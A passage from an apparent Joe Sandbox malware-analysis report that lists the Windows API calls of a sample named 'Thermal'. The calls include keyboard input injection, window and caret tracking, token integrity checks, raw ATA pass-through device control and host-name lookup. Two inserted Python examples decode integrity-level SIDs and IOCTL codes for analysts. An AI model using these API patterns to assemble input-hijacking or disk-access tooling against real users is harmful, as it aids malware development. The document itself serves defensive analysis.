                                                • Opcode ID: c2361a711c3141d890d2b495c52aca8bdaf177a6f245188d14daa2771da8d8d7
                                                • Instruction ID: a3d7a3666b1aff95d9999c1fe53e68f0ccd39e4ad14fccb7c9045daf91177ac8
                                                • Opcode Fuzzy Hash: c2361a711c3141d890d2b495c52aca8bdaf177a6f245188d14daa2771da8d8d7
                                                • Instruction Fuzzy Hash: 2C416A70A04219DFDB21CF98C884BAD7BF5FB89311F1485A9EA189B361D734E841DF50
                                                APIs
                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007D1326
                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 007D1342
                                                • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 007D13A8
                                                • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 007D13FA
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: 4f534c5dfee41ea36c55e256cf3fae958f65bed089282c3ba2b5f3de2ddd559e
                                                • Instruction ID: 7bf1df79f5ea610c1d3e8cd0f576b6a2d597a388496665583bcaceb82ede4eb6
                                                • Opcode Fuzzy Hash: 4f534c5dfee41ea36c55e256cf3fae958f65bed089282c3ba2b5f3de2ddd559e
                                                • Instruction Fuzzy Hash: 60310770E40258BEFF348A658C09BFE7BB9AB45320F84421BE490627D1D37C89519BA1
                                                APIs
                                                • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 007D1465
                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 007D1481
                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 007D14E0
                                                • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 007D1532
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: 9ecdf6a8b50825cea521af5f4d21a6ef945df20c76d4f3c7d975860c52d8215e
                                                • Instruction ID: da33f123ecaf165899e61500aa3b6a256b30bb0568d9b785c2acb072df800449
                                                • Opcode Fuzzy Hash: 9ecdf6a8b50825cea521af5f4d21a6ef945df20c76d4f3c7d975860c52d8215e
                                                • Instruction Fuzzy Hash: CA314E70E40298BEFF348A659C04BFABB75AB85310F88831BE491523D1C37C89559B61
                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007A642B
                                                • __isleadbyte_l.LIBCMT ref: 007A6459
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007A6487
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007A64BD
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: b60eb5be80a68aef34f65a79439e51519f585cbae0277ecd2f37bbaa858d296a
                                                • Instruction ID: 044d6566a71a918a6c151f423f5991fd6683d9214c3d250bc0594115c8ed8736
                                                • Opcode Fuzzy Hash: b60eb5be80a68aef34f65a79439e51519f585cbae0277ecd2f37bbaa858d296a
                                                • Instruction Fuzzy Hash: CE31C631604296EFDF218F75CC44BAA7BA5FF86310F194229F86487191EB39DA50DB50
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 007F553F
                                                  • Part of subcall function 007D3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007D3B4E
                                                  • Part of subcall function 007D3B34: GetCurrentThreadId.KERNEL32 ref: 007D3B55
                                                  • Part of subcall function 007D3B34: AttachThreadInput.USER32(00000000,?,007D55C0), ref: 007D3B5C
                                                • GetCaretPos.USER32(?), ref: 007F5550
                                                • ClientToScreen.USER32(00000000,?), ref: 007F558B
                                                • GetForegroundWindow.USER32 ref: 007F5591
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                • String ID:
                                                • API String ID: 2759813231-0
                                                • Opcode ID: c82d5ae88c5dda3d022dbeaeb5f1e5b186814961e8170929d1ec823d45644b52
                                                • Instruction ID: dd4b96c257f30f34b82de776565b68ff22b73f6e47a235f301e0b34afcf04fd1
                                                • Opcode Fuzzy Hash: c82d5ae88c5dda3d022dbeaeb5f1e5b186814961e8170929d1ec823d45644b52
                                                • Instruction Fuzzy Hash: CD312F71A00108EFDB10EFA5C8859EEB7F9EF98304F10806AE515E7241DB79AE408FA0
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • GetCursorPos.USER32(?), ref: 007FCB7A
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007ABCEC,?,?,?,?,?), ref: 007FCB8F
                                                • GetCursorPos.USER32(?), ref: 007FCBDC
                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007ABCEC,?,?,?), ref: 007FCC16
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                • String ID:
                                                • API String ID: 2864067406-0
                                                • Opcode ID: 985e969aced4556fe75a7973b4ff5d3c9915389d3fa59156fd84dda5895e0d31
                                                • Instruction ID: 9aa79783933daa5869f5a9c35b0c62a7444d75abd20426d463979777d98633c1
                                                • Opcode Fuzzy Hash: 985e969aced4556fe75a7973b4ff5d3c9915389d3fa59156fd84dda5895e0d31
                                                • Instruction Fuzzy Hash: 5131817950001CAFCB268F95CC59EBA7BB9FB89310F044099FA15A7361C7359D51EFA0
                                                APIs
                                                • __setmode.LIBCMT ref: 00790BE2
                                                  • Part of subcall function 0078402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D7E51,?,?,00000000), ref: 00784041
                                                  • Part of subcall function 0078402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D7E51,?,?,00000000,?,?), ref: 00784065
                                                • _fprintf.LIBCMT ref: 00790C19
                                                • OutputDebugStringW.KERNEL32(?), ref: 007C694C
                                                  • Part of subcall function 00794CCA: _flsall.LIBCMT ref: 00794CE3
                                                • __setmode.LIBCMT ref: 00790C4E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                • String ID:
                                                • API String ID: 521402451-0
                                                • Opcode ID: c589b273b9c3052813750701471f362e86da66377c0d809c8f264e3e77885202
                                                • Instruction ID: 6b6ab4fe93bf39f4572bf35453d3cd6aaa0a448404c919d2847dd6290d662ef4
                                                • Opcode Fuzzy Hash: c589b273b9c3052813750701471f362e86da66377c0d809c8f264e3e77885202
                                                • Instruction Fuzzy Hash: 75110272A04208EEDF18B7A4BC4AEBE7B69EF42320F14015AF204962C2DF6D584247A1
                                                APIs
                                                  • Part of subcall function 007C8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007C8D3F
                                                  • Part of subcall function 007C8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D49
                                                  • Part of subcall function 007C8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D58
                                                  • Part of subcall function 007C8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D5F
                                                  • Part of subcall function 007C8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D75
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007C92C1
                                                • _memcmp.LIBCMT ref: 007C92E4
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007C931A
                                                • HeapFree.KERNEL32(00000000), ref: 007C9321
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                • String ID:
                                                • API String ID: 1592001646-0
                                                • Opcode ID: 4c4b19761cbaab3177ca7446debc76913dbbadb34b81dbedb4fe555e9f532254
                                                • Instruction ID: 274cde1c7bed595763e193792cdfd2fea6aed3a95a6a5a5813555f0cb74f50cf
                                                • Opcode Fuzzy Hash: 4c4b19761cbaab3177ca7446debc76913dbbadb34b81dbedb4fe555e9f532254
                                                • Instruction Fuzzy Hash: 43216632E40109EBDB50DFA4C949FEEB7B8FF44301F04405DE985AB291E778AA05CBA0
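The entry above reads the token's mandatory label (GetTokenInformation with TokenIntegrityLevel, called twice in the usual size-query-then-fill pattern with a HeapAlloc in between) and then resolves a privilege name with LookupPrivilegeValueW and compares a buffer with _memcmp. The listing does not show how the returned label is interpreted. The following is an added example, not code from the sample or from Joe Sandbox: it parses the raw SID that GetTokenInformation hands back for TokenIntegrityLevel (TOKEN_MANDATORY_LABEL.Label.Sid) and maps its last sub-authority to an integrity level, using a constructed medium-integrity SID as input. The names build_integrity_sid, parse_sid, integrity_level and is_at_least are this example's own.

```python
import struct

# Mandatory label SIDs have the form S-1-16-<RID>; authority 16 is
# SECURITY_MANDATORY_LABEL_AUTHORITY.
MANDATORY_LABEL_AUTHORITY = 16

# Well-known integrity RIDs (SECURITY_MANDATORY_*_RID). Windows compares
# integrity levels numerically, so a value between two entries behaves like
# the band below it; the lookup below mirrors that.
INTEGRITY_LEVELS = [
    (0x0000, "Untrusted"),
    (0x1000, "Low"),
    (0x2000, "Medium"),
    (0x2100, "Medium Plus"),
    (0x3000, "High"),
    (0x4000, "System"),
    (0x5000, "Protected Process"),
]


def build_integrity_sid(rid):
    """Construct the raw SID bytes for S-1-16-<rid> (constructed test input, not captured data)."""
    # Revision (1), SubAuthorityCount (1), 6-byte big-endian IdentifierAuthority,
    # then each sub-authority as a little-endian DWORD.
    return bytes([1, 1]) + MANDATORY_LABEL_AUTHORITY.to_bytes(6, "big") + struct.pack("<I", rid)


def parse_sid(blob):
    """Parse a binary SID into its textual S-R-A-S1-...-Sn form, validating the layout first."""
    if len(blob) < 8:
        raise ValueError("SID shorter than its fixed header")
    revision, count = blob[0], blob[1]
    if revision != 1:
        raise ValueError("unsupported SID revision %d" % revision)
    # SID_MAX_SUB_AUTHORITIES is 15; also make sure the sub-authorities fit the buffer.
    if count > 15 or len(blob) < 8 + 4 * count:
        raise ValueError("SID sub-authority count does not fit the buffer")
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, blob, 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def integrity_level(blob):
    """Return (name, rid) for a mandatory-label SID as returned for TokenIntegrityLevel."""
    text = parse_sid(blob)
    parts = text.split("-")
    if len(parts) < 4 or int(parts[2]) != MANDATORY_LABEL_AUTHORITY:
        raise ValueError("not a mandatory label SID: " + text)
    # The integrity RID is the last sub-authority, which is what the
    # *GetSidSubAuthority(sid, *GetSidSubAuthorityCount(sid) - 1) idiom reads.
    rid = int(parts[-1])
    name = "Untrusted"
    for level, level_name in INTEGRITY_LEVELS:
        if rid >= level:
            name = level_name
    return name, rid


def is_at_least(blob, required_rid):
    """The comparison an elevation check makes: numeric (>=), not equality."""
    return integrity_level(blob)[1] >= required_rid


# Constructed sample: the SID a normal, non-elevated user process receives
# (S-1-16-8192, medium integrity). Laid out by hand rather than via the builder
# so the byte layout is visible.
MEDIUM_SID = bytes.fromhex("0101" "000000000010" "00200000")

if __name__ == "__main__":
    print(parse_sid(MEDIUM_SID), integrity_level(MEDIUM_SID))
    print("runs as High or above:", is_at_least(MEDIUM_SID, 0x3000))
```

The bounds checks in parse_sid matter when the bytes come from an untrusted process image rather than from GetTokenInformation itself: a SubAuthorityCount larger than the buffer would otherwise read past the end of the dump.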
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EC), ref: 007F63BD
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007F63D7
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007F63E5
                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007F63F3
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$Long$AttributesLayered
                                                • String ID:
                                                • API String ID: 2169480361-0
                                                • Opcode ID: 3bbb09ef52e176b61f88d49fa563ac92da64460b951ca663546e2bf0cb2d35a4
                                                • Instruction ID: fdba685d7920014f604a46390698655bde2b80c26739a912a229f79260ae837e
                                                • Opcode Fuzzy Hash: 3bbb09ef52e176b61f88d49fa563ac92da64460b951ca663546e2bf0cb2d35a4
                                                • Instruction Fuzzy Hash: 30119631305518AFDB14AB24DC49FBA77A9EF45320F148119F616D73D2CBA8AD01CB95
                                                APIs
                                                  • Part of subcall function 007CF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007CE46F,?,?,?,007CF262,00000000,000000EF,00000119,?,?), ref: 007CF867
                                                  • Part of subcall function 007CF858: lstrcpyW.KERNEL32(00000000,?,?,007CE46F,?,?,?,007CF262,00000000,000000EF,00000119,?,?,00000000), ref: 007CF88D
                                                  • Part of subcall function 007CF858: lstrcmpiW.KERNEL32(00000000,?,007CE46F,?,?,?,007CF262,00000000,000000EF,00000119,?,?), ref: 007CF8BE
                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,007CF262,00000000,000000EF,00000119,?,?,00000000), ref: 007CE488
                                                • lstrcpyW.KERNEL32(00000000,?,?,007CF262,00000000,000000EF,00000119,?,?,00000000), ref: 007CE4AE
                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,007CF262,00000000,000000EF,00000119,?,?,00000000), ref: 007CE4E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: lstrcmpilstrcpylstrlen
                                                • String ID: cdecl
                                                • API String ID: 4031866154-3896280584
                                                • Opcode ID: afbc68b6d5fdc365823930ff2341ac6e85007c85fa78a556c37cb46a2077db23
                                                • Instruction ID: e009f547a9cb4ac4d721647b8d310bc913ed4856b30d48297ff52b0aa3cf9c81
                                                • Opcode Fuzzy Hash: afbc68b6d5fdc365823930ff2341ac6e85007c85fa78a556c37cb46a2077db23
                                                • Instruction Fuzzy Hash: 7511603A200345EFDB25AF24EC49E7A77A9FF45350B80402EF806CB2A0FB759951CB91
                                                APIs
                                                • _free.LIBCMT ref: 007A5331
                                                  • Part of subcall function 0079593C: __FF_MSGBANNER.LIBCMT ref: 00795953
                                                  • Part of subcall function 0079593C: __NMSG_WRITE.LIBCMT ref: 0079595A
                                                  • Part of subcall function 0079593C: RtlAllocateHeap.NTDLL(00D70000,00000000,00000001,?,00000004,?,?,00791003,?), ref: 0079597F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: d25a5581d1df0c0bb80e0d9597316f7020961add16f9b4eb143daf31cad5aa56
                                                • Instruction ID: 66028b49f21bdc308f5a2d112033072a93df63beed57a2ca693edf2eaa8fae12
                                                • Opcode Fuzzy Hash: d25a5581d1df0c0bb80e0d9597316f7020961add16f9b4eb143daf31cad5aa56
                                                • Instruction Fuzzy Hash: 2F112732505E15EFCF253F70BC0975E3794AFD63A5F110B29F8189A190CEBC89408780
                                                APIs
                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007D4385
                                                • _memset.LIBCMT ref: 007D43A6
                                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007D43F8
                                                • CloseHandle.KERNEL32(00000000), ref: 007D4401
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                                • String ID:
                                                • API String ID: 1157408455-0
                                                • Opcode ID: 845ac93f1e58c02398532c22143ee836e3b90d9979c13038435103b4f8cc0865
                                                • Instruction ID: 78a9ad867a479d79b7651d7b76062bae33b236ed956efcf1b481e80555137e95
                                                • Opcode Fuzzy Hash: 845ac93f1e58c02398532c22143ee836e3b90d9979c13038435103b4f8cc0865
                                                • Instruction Fuzzy Hash: 09118A75901228BBD7309BA5AC4DFEBBB7CEF45760F10459AF908E7290D6744E808BA4
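The entry above opens a device handle with CreateFileW (dwDesiredAccess C0000000 is GENERIC_READ|GENERIC_WRITE, dwShareMode 3 is FILE_SHARE_READ|FILE_SHARE_WRITE, dwCreationDisposition 3 is OPEN_EXISTING, dwFlagsAndAttributes 80 is FILE_ATTRIBUTE_NORMAL), zeroes a buffer, and issues DeviceIoControl with control code 0004D02C and 512-byte (00000200) input and output buffers. The report gives the control code only as a number. The following added example (not code from the sample or from Joe Sandbox) splits a Windows I/O control code into the fields of the SDK's CTL_CODE macro and names it when it matches a small table of public storage IOCTLs rebuilt from their SDK definitions: 0004D02C decomposes to device type 4 (FILE_DEVICE_CONTROLLER, which is IOCTL_SCSI_BASE), read+write access, function 0x40B, METHOD_BUFFERED, which is the public definition of IOCTL_ATA_PASS_THROUGH. The function names ctl_code and decode_ioctl, the table contents and the vendor_range flag are this example's own.

```python
# Layout of a Windows I/O control code, from the CTL_CODE macro in the SDK headers:
#   bits 31..16  DeviceType
#   bits 15..14  RequiredAccess (FILE_ANY_ACCESS=0, FILE_READ_ACCESS=1, FILE_WRITE_ACCESS=2)
#   bits 13..2   Function (12 bits; 0x800 and above are reserved for non-Microsoft drivers)
#   bits  1..0   Method (METHOD_BUFFERED=0, METHOD_IN_DIRECT=1, METHOD_OUT_DIRECT=2, METHOD_NEITHER=3)

DEVICE_TYPES = {
    0x02: "FILE_DEVICE_CD_ROM",
    0x04: "FILE_DEVICE_CONTROLLER",    # also IOCTL_SCSI_BASE
    0x07: "FILE_DEVICE_DISK",          # also IOCTL_DISK_BASE
    0x12: "FILE_DEVICE_NETWORK",
    0x22: "FILE_DEVICE_UNKNOWN",
    0x2D: "FILE_DEVICE_MASS_STORAGE",  # also IOCTL_STORAGE_BASE
}
ACCESS_NAMES = {
    0: "FILE_ANY_ACCESS",
    1: "FILE_READ_ACCESS",
    2: "FILE_WRITE_ACCESS",
    3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS",
}
METHOD_NAMES = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}


def ctl_code(device_type, function, method, access):
    """Python port of CTL_CODE(DeviceType, Function, Method, Access)."""
    if not (0 <= device_type < 0x10000 and 0 <= function < 0x1000 and 0 <= method < 4 and 0 <= access < 4):
        raise ValueError("CTL_CODE field out of range")
    return (device_type << 16) | (access << 14) | (function << 2) | method


# Public storage IOCTLs, rebuilt from their SDK definitions rather than pasted as numbers
# so a typo shows up as a failed lookup instead of a silent mis-name.
KNOWN_IOCTLS = {
    ctl_code(0x04, 0x401, 0, 3): "IOCTL_SCSI_PASS_THROUGH",
    ctl_code(0x04, 0x402, 0, 3): "IOCTL_SCSI_MINIPORT",
    ctl_code(0x04, 0x405, 0, 3): "IOCTL_SCSI_PASS_THROUGH_DIRECT",
    ctl_code(0x04, 0x40B, 0, 3): "IOCTL_ATA_PASS_THROUGH",
    ctl_code(0x04, 0x40C, 0, 3): "IOCTL_ATA_PASS_THROUGH_DIRECT",
    ctl_code(0x2D, 0x500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",
    ctl_code(0x07, 0x000, 0, 0): "IOCTL_DISK_GET_DRIVE_GEOMETRY",
    ctl_code(0x07, 0x020, 0, 1): "SMART_GET_VERSION",
    ctl_code(0x07, 0x022, 0, 3): "SMART_RCV_DRIVE_DATA",
}


def decode_ioctl(code):
    """Split an I/O control code into its CTL_CODE fields and name it if it is in the table."""
    code &= 0xFFFFFFFF
    fields = {
        "device_type": code >> 16,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }
    fields["device_type_name"] = DEVICE_TYPES.get(fields["device_type"], "unknown device type")
    fields["access_name"] = ACCESS_NAMES[fields["access"]]
    fields["method_name"] = METHOD_NAMES[fields["method"]]
    fields["name"] = KNOWN_IOCTLS.get(code)
    # Function codes 0x800 and above are the vendor range: a code there, especially with an
    # unknown device type, points at a third-party or custom driver and deserves a closer look.
    fields["vendor_range"] = fields["function"] >= 0x800
    return fields


if __name__ == "__main__":
    # The control code from the DeviceIoControl call in the listing above.
    for key, value in decode_ioctl(0x0004D02C).items():
        print("%-17s %s" % (key, value))
```

When extending the table, prefer adding entries through ctl_code with the device base, function, method and access from the header that defines the IOCTL; the lookup then only matches a code whose four fields all agree with that definition.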
                                                APIs
                                                  • Part of subcall function 0078402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D7E51,?,?,00000000), ref: 00784041
                                                  • Part of subcall function 0078402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D7E51,?,?,00000000,?,?), ref: 00784065
                                                • gethostbyname.WSOCK32(?,?,?), ref: 007E6A84
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6A8F
                                                • _memmove.LIBCMT ref: 007E6ABC
                                                • inet_ntoa.WSOCK32(?), ref: 007E6AC7
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
